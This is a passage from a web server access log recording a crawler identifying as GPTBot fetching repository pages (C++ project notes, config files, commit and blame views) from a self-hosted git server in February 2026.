AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:15:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:15:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" +[17/Feb/2026:15:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" +[17/Feb/2026:15:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12861] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" +[17/Feb/2026:15:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2ftemplates%2findex.html" [Client 74.7.227.38] [Length 31836] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 10607] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:15:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21515] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" +[17/Feb/2026:15:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" [Client 74.7.227.38] [Length 9864] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:15:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" [Client 74.7.227.38] [Length 9865] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:15:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" [Client 74.7.227.38] [Length 10811] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:15:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" [Client 74.7.227.38] [Length 10801] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:15:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" [Client 74.7.227.38] [Length 10828] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:15:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" [Client 74.7.227.38] [Length 10800] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:15:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 11086] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" +[17/Feb/2026:15:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11722] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" +[17/Feb/2026:15:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11751] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" +[17/Feb/2026:15:12:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/metadata.json" +[17/Feb/2026:15:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/metadata.json" +[17/Feb/2026:15:12:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/metadata.json" +[17/Feb/2026:15:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/metadata.json" +[17/Feb/2026:15:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10315] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" +[17/Feb/2026:15:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10328] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" +[17/Feb/2026:15:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23929] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23927] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23929] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23927] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176801] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176800] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176798] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" [Client 74.7.227.38] [Length 10133] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10720] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" +[17/Feb/2026:15:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10721] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" +[17/Feb/2026:15:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71402] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71401] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659893] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659891] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71399] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659891] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659893] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71402] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10200] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10199] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 